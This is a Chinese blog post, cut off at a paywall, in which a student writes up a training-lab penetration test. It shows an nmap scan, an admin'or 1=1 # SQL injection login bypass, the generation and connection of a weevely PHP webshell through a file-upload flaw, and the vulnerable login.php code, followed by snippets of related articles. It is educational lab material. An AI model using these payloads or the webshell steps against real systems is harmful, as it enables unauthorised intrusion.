记一次内网渗透测试实训总结

最新推荐文章于 2026-06-17 13:22:35 发布
原创 最新推荐文章于 2026-06-17 13:22:35 发布 · 4.9k 阅读 · 32
标签
#安全 #web安全
本文详细记录了一次内网渗透的过程,包括web服务器的登录漏洞、文件上传绕过、SQL注入、提权Linux到root,以及后续的Windows服务器渗透,展示了从信息收集到权限升级的完整流程。

原文连接

前言

时间很快就来到了学期的最后一个月,和上学期一样,最后的几周是实训周,而这次实训恰好就是我比较喜欢的网络攻防,因为之前学过相关的知识,做过一些靶场,相比于其他同学做起来要快些,不过内网渗透也还是头一次,得益于这次的内网渗透靶场环境,小小地体验了一下,期间也踩了许多坑,也陆陆续续地解决掉了。所以就以本篇文章做个总结,目的在于梳理所学到地知识点和分享。

环境&工具

物理机 (win 10) ip:172.20.10.1

工具:蚁剑火狐(hackbar插件)

攻击机(kali) ip:172.20.10.129

工具:MSF框架Burpsuite冰蝎weevelyNmapProxychains4

靶场拓扑图

image-20220617105452122

渗透过程

准备

首先需要拿到一个入口地址

在FW中查看

image-20220617105751376

这个是Web服务器的外网地址 10.100.1.104,直接访问是访问不到的,需要使用老师给的vpn。

这里直接在kali中配置vpn,

image-20220617110403881

得到一个10.200.0.77地址。(这里得到的地址会经常变,后面操作的时候可能会不一致)

渗透测试web服务器

刚刚通过查看FW防火墙的配置拿到了web服务器的地址10.100.1.104

信息收集

端口扫描

nmap -sT 10.100.1.104 -sV
# sT tcp三次握手扫描(默认为sT)
# sV 扫描服务的版本信息
image-20220617111527491

开放了80端口,web服务器是用Apache 2.2.15,操作系统为Centos

web渗透测试

登录处存在万能密码 or 1=1 #绕过

image-20220617112218919
image-20220617112454795
image-20220617112641659

成功进入到后台管理界面

在用户管理->头像编辑处存在文件上传绕过检测漏洞

image-20220617113134279

使用kali自带的weevely工具生成php后门

weevely generate 123456 backdoor.php
image-20220617113047690

进行上传

image-20220617113206428
image-20220617113328177
image-20220617113402204

在头像处找到后门的上传地址

image-20220617113527315
image-20220617113642098

连接php后门

weevely http://10.100.1.104/avatar/admin.php 123456
image-20220617113847235

已经成功拿到一个webshell权限

漏洞分析

sql注入漏洞分析

刚刚是用sql注入进入的后台,burp抓包发现是请求的login.php文件,接下来对该文件进行分析。

# 省略了无关紧要的代码
<?php
if (isset($_POST['submit'])) {
   
   
  include 'config/dbconnect.php';

  // Get input
  $email = $_POST['email'];
  $password = md5($_POST['password']);

  // Check database
  $query = "SELECT username, isadmin FROM users WHERE email = '$email' and password = '$password';";
  $result = mysqli_query($conn, $query);

  $num = @mysqli_num_rows($result); // The '@' character suppresses errors
  if ($num > 0) {
   
   
    // Feedback for end user
    while ($row = mysqli_fetch_assoc($result)) {
   
   
      $_SESSION['logged'] = true;
      $_SESSION['username'] = $row["username"];
      if ($row["isadmin"] == 1) {
   
   
        $_SESSION['isadmin'] = true;
      } else {
   
   
        $_SESSION['isadmin'] = false;
      }
      header("Location: http://" . $_SERVER['HTTP_HOST'] . "/admin.php?page=dashboard");
    }
  } else {
   
   
    // Feedback for end user
    $_SESSION['logged'] = false;
    echo "<script>$('#login-alert').removeClass('d-none')</script>";
  }

  mysqli_close($conn);
}
?>

全局变量POST接收了emailpassword,登录的sql语句为

$query = "SELECT username, isadmin FROM users WHERE email = '$email' and password = '$password';";

可以发现没怎么过滤,传入的密码进行md5加密,我们在email处构造的万能密码admin'or 1=1 #,拼接到sql语句中为

$query = "SELECT username, isadmin FROM users WHERE email = 'admin'or 1=1 #' and password = '$password';";

sql语句中#为注释符,这里真正执行的sql语句为

SELECT username, isadmin FROM users WHERE email = 'admin'or 1=1

'admin' or 1=1 这个where条件,会查询出所有的用户名。

查询得记录值不少于1条就会进入if语句,进而执行$_SESSION['logged'] = true;

if ($num > 0) {
   
   
    // Feedback for end user
    while ($row = mysqli_fetch_assoc($result)) {
   
   
      $_SESSION['logged'] = true;
      $_SESSION['username'] = $row["username"];
      if ($row[
最低0.47元/天 解锁文章
渗透测试思路总结
weixin_33881050的博客
09-15 2189
一、说明 《Metasploit渗透测试魔鬼训练营》等书已经对渗透测试的步骤流程划分得比较合理透彻了,但感觉在多次通读该类书藉之后仍总感觉不得要领----要对一台给定的主机进行渗透还是不懂到底该如何着手。想来主要是存在以下两个问题。 第一个是在渗透操作系统时,最为关键的从漏洞分析到渗透攻击这一步很难跨越。因为按书中漏洞分析基本只有openvas等漏洞扫描器一条途径,漏洞利用只有Metasploit...
VLAN、trunk、hybrid理论总结,实验详尽
lwljh134的博客
12-05 1315
vlan、trunk、hybrid
项目实习(五)网络渗透实验
eck_777的博客
09-26 7649
这是大学期间进行的生产实习内容,主要是进行一次简单的网络渗透测试。 实习的目的及任务 实习的目的 生产实习是实现理论知识和实践相结合的重要环节。通过实习,学生将对于课堂学习的基础和专业理论知识有更深入的掌握。特别是对信息安全技术与工程的最新发展和应用有较深入的了解。同时通过生产实习,进一步锻炼学生理论与实践相结合的能力,提高学习的主动性,为毕业后的社会工作打下良好的基础。 实习任务要求 (1)严...
实战 |一次简单渗透测试实战
2301_76168381的博客
07-06 1095
在进行渗透测试时,首先需要进行的是信息收集,这是一项非常重要的任务。就像孙子兵法所说的:“知己知彼,百战不殆”。因此,我们需要选择目标站点并搜集尽可能多的信息。以下是我们搜集到的信息:
近源渗透从监控系统到机房再到教育局网络安全
2301_79475922的博客
09-02 1046
监控室的位置居花某所知是在1楼的位置,每次放学都会路过,但是不清是几号了,微机室的位置是在2楼,同样不清号是20几了,而1楼和2楼同样分布有大量的教室和办公室,所以网络分布还是很杂的,但同时这两个也是比较好分辨的,办公室的计算机通常来说没人用会关机,教室里就更不用说了上面花某也说过每个教室联网的可能就只有一个电子黑板了,而放学后会关机下网,所以说除去办公室和教室放假已下网的设备,像监控室和服务器这类上网设备还是比较简单扫出来的。没胆量也违法,所以只能搞近源。也是最麻烦的,也是我拖了这么久的主要原因。
一次渗透测试
maomaoyyds_的博客
10-04 1712
网络攻防实训
渗透实训-一次艰难的打点过程(某985)
qq_73648490的博客
03-12 1255
渗透某985高校
避坑指南:渗透测试15个靶场推荐_渗透测试靶场
wangluo12138的博客
11-28 1025
网络安全学习必刷的15个实战靶场推荐,帮助提升渗透测试技能。包括Try Hack Me(在线渗透测试平台)、DVWA(网页安全漏洞演示)、sql-labs(SQL注入专项训练)、xss-labs(XSS攻击实践)、upload-labs(文件上传漏洞)等基础靶场,以及WebGoat(OWASP开发)、DSVW(轻量级漏洞平台)、Pikachu(综合漏洞环境)等进阶平台。此外还推荐Vulfocus(Docker漏洞集成)、Vulnhub(虚拟机靶机)和Vulhub(Docker漏洞环境)等专业训练资源,适合不
一次靶场渗透实训
weixin_51681694的博客
12-24 313
小麻
渗透测试中新手必练的15个靶场!
fly_enum的博客
09-26 713
还在对着那些枯燥的渗透测试理论啃得头昏脑涨?别傻了!光说不练假把式,真正的成长来自实战!如果你也正愁找不到合适的“磨刀石”,那么这15个靶场绝对能让你脱胎换骨,从菜鸟变身网络安全老司机!
一次Vulnhub靶机练习成功拿下root权限
https://www.yuque.com/onlyxiu-123com
07-18 1040
1、首先使用sudoarp-scan-l命令对局域网内的主机进行扫描,并推断出该目标ip地址!2、接着使用nmap,对该主机进行端口扫描nmap-sV-A192.168.1.15,就发现该主机开启了22,80端口以及版本号的相关信息。到这我们就会产生两个思路,爆破ssh或从80端口下手,寻找该网址是否有入口点,但ssh用户名都没有,无疑这是很大的工作量,所以我们就从80端口入手。!对该网址进行后台目录的扫描,经过测试发现页面存在信息,但依旧对我们渗透毫无帮助。!......
Vulnhub靶机 Fristileaks 1.3(渗透测试详解)
2301_78721909的博客
08-01 544
Vulnhub靶机 Fristileaks 1.3 详解(from wuhu)
一次有趣的渗透测试
hl1293348082的专栏
05-16 703
最近在做渗透测试的练习中遇到一个比较有意思的站点,在此录下来,希望能给向我一样刚入安全圈不久的萌新提供一些基本思路吧。 在拿到目标站点的域名时,首要的工作肯定是进行一系列的信息搜集工作,具体搜集哪些信息以及怎么有效搜集,可以参考 Google 或者百度。 下面为了文章的简洁性,我只提及我会利用到的一些站点信息。 首先网站的真实 IP 并没有隐藏在 CDN 后面,直接在 ThreadBook 上查看同 IP 的旁站,显示足足 189 个! 看到这个数的时候,说实话内心是沉重的,虽然可以从众多的旁
web渗透、内网渗透,6个月以来的学习感受
Nginx521的博客
12-30 2465
网安自学之路、web渗透、内网渗透、免杀、隧道技术
Kubernetes1.18.5部署,kuboard可视化管理界面,harbor私有仓库的部署,docker与dockerfile创建私有镜像
weixin_45322253的博客
03-22 7124
强制删除一个pod kubectl delete pods --grace-period=0 --force 强制删除一组coredns,两个一起删除 kubectl delete pod coredns-68b9d7b887-5pd75 coredns-68b9d7b887-wc8qw -n kube-system --grace-period=0 --force
渗透测试步骤总结
weixin_41038905的博客
04-02 533
渗透测试过程中不到万不得已不要用爆破,会留下大量的证据 假设我们已经到目标的内网的某个设备上了,我们可以做什么呢? 1、肯定是要做权限维持,为以后的渗透先铺好路,要不然很容易就会前功尽弃 2、了解目标系统的详细版本信息 wmic OS get Caption,CSDVersion,OSArchitecture,Version 3.查看当前机器处于什么网络环境中 ipconfig/all &amp...
渗透测试必刷靶场清单:附下载地址与核心学习价值
weixin_44257023的博客
12-09 897
本文精选2025年渗透测试工程师必刷靶场清单,按学习梯度分类推荐。入门级推荐DVWA和Pikachu,覆盖OWASP Top10漏洞;专项靶场如SQLi-Labs、Upload-Labs专注单一漏洞深度训练;综合靶场VulnHub和Vulhub模拟全链路渗透流程;内网实战推荐VulnStack红日靶场;竞赛对抗推荐Hack The Box和攻防世界。文章提供各靶场官方下载地址,并详细说明核心学习价值,强调靶场训练需结合实战思维,避免工具依赖,遵守合规要求。通过系统化靶场训练可实现从基础到高阶的技术跃升。
Web渗透测试底层逻辑:从信息收集到内网横向移动的完整实战指南
最新发布
weixin_34204722的博客
06-17 347
Web渗透测试作为网络安全领域的核心技术,其本质是模拟攻击者对Web应用进行授权安全评估的过程。其核心原理在于通过系统化的方法识别和利用系统漏洞,以验证安全防护的有效性。这项技术的价值在于帮助企业发现潜在安全风险,提升整体安全防护水平,广泛应用于金融、电商、政务等各类在线业务系统安全评估。在实战中,信息收集是渗透测试的基石,它决定了攻击面的广度与深度;而内网横向移动则是获取核心资产权限的关键阶段。本文将以SQL注入、权限提升等经典漏洞为例,深入剖析Web渗透的底层逻辑与实战技巧,帮助安全从业者构建从外网突
信安冬令营实训报告(信息收集,主机渗透,内网渗透)
居上
07-03 1058
文章目录一丶摘要二丶实训内容实验一*信息收集Nmap目标主机发现端口扫描开放服务和操作系统检测脚本扫描其他Nessus目标开启服务进入扫描界面使用高级扫描扫描win7其他实验二*主机渗透Metasploit目标启动搜索模块使用模块查看选项设置参数运行模块命令执行其他实验三*内网渗透ARP欺骗目标组网在Win7上安装foxmail安装netwox伪造身份Wireshark抓取流量其他三、测试结果发现的问题四、安全建议关于防护永恒之蓝漏洞的建议关于防护局域网ARP欺骗的建议其他建议 一丶摘要 在XXX冬令营2
linux实验总结及心得_安全实验室 | 内网渗透—Linux权限维持技巧总结
weixin_28929303的博客
01-14 703
在上一篇文章中我们介绍了内网渗透中Windows环境下进行权限维持(点击阅读)的方式,本期我们将视角集中在Linux系统中继续对内网渗透中的权限维持方式进行探索。Linux也是在内网渗透中很常见的操作系统,但是其内部实现方式却与Windows有着本质的区别。我们在对Windows权限维持方式的基础上总结Linux系统的权限维持方式。01SUID后门SUID是Set uid的简称,当一个文...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值